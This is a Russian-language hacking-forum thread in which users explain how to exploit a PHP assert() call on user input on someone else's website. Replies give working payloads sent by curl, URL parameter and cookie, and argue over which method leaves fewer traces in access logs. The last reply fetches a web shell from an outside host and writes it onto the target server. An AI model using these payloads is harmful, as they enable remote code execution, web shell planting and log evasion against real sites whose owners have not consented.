Форумы PHP assert

Discussion in 'Уязвимости CMS/форумов' started by marynli, 25 Apr 2016.

  1. marynli

    marynli Banned

    Joined:
    29 Jun 2015
    Messages:
    27
    Likes Received:
    7
    Reputations:
    0
    Допустим в php файле на сайте есть строка вида:
    PHP:
    assert($_REQUEST[123123123);
    Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).

    Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
    Какой код лучше заливать?
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    в параметр 123123123 пишешь пхп код, он выполняется

    curl 'http://site.ru/' --data '123123123=phpinfo();'
     
    _________________________
    marynli likes this.
  3. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    site.com/yourfile.php?123123123=phpinfo();
     
    marynli likes this.
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    get палевно
     
    _________________________
  5. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    а пост беспалевно? вот тебе выдерка из access log

    xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    вот тебе выдержка из access log

    xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44

    сам ответь что беспалевней
     
    _________________________
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    если уж на то пошло то я бы через куки слал

    curl 'http://site.ru' -H 'Cookie: '123123123=phpinfo()'
     
    _________________________
    strelok20094 likes this.
  8. marynli

    marynli Banned

    Joined:
    29 Jun 2015
    Messages:
    27
    Likes Received:
    7
    Reputations:
    0
    А как запихать туда веб шелл?
     
  9. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    Code:
    site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php");
    
    зальётся по пути site.com/shell.php
     
    marynli likes this.